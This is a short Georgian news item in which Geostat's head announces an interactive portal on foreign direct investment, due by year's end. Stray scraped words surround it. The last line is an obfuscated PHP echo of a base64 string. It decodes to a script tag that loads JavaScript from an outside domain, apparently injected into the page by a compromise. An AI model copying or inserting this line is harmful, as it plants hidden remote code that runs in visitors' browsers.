celsiusi
ავერსი საქკაბელი
წლის ბოლომდე საქსტატი პირდაპირი უცხოური ინვესტიციების პორტალს წარადგენს – ამის შესახებ bm.ge-ს საქსტატის ხელმძღვანელმა გოგიტა თოდრაძემ განუცხადა.
 
მისი თქმით, ინტერაქტიული პორტალის მეშვეობით შესაძლებელი იქნება პირდაპირი უცხოური ინვესტიციების შესახებ დეტალური ინფორმაციის ნახვა და სხვა წლებთან შედარება.
 
“წლებია უკვე ვავითარებთ ინტერაქტიულ პორტალებს და ერთ–ერთი მორიგი, რომლის განვითარებაც უახლოეს მომავალში იგეგმება, არის პირდაპირი უცხოური ინვესტიციების პორტალი, რომელიც მომხმარებლისთვის ხელმისაწვდომი იქნება მიმდინარე წლის ბოლომდე. ეს პორტალი იძლევა შესაძლებლობას, დინამიკაში დავაკვირდეთ პირდაპირი უცხოური ინვესტიციების რაოდენობას ქვეყნების ჭრილში, ეკონომიკის სექტორების მიხედვით.
 
პორტალი პერიოდების მიხედვით შედარების შესაძლებლობასაც მოგვცემს. შეგვეძლება, შევადაროთ FDI–ის სტრუქტურა ორ საანგარიშო პერიოდში: მაგალითად, 2021 წლის მეორე კვარტალი შევადაროთ 2015 წლის მეორე კვარტალთან და დავინახოთ – ვინ იყვნენ ძირითადი ინვესტორები, ქვეყნები, დავაკვირდეთ სააქციო კაპიტალის რეინვესტიციის და სავალო ვალდებლების დინამიკას”,– აცხადებს გოგიტა თოდრაძე.
1025
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");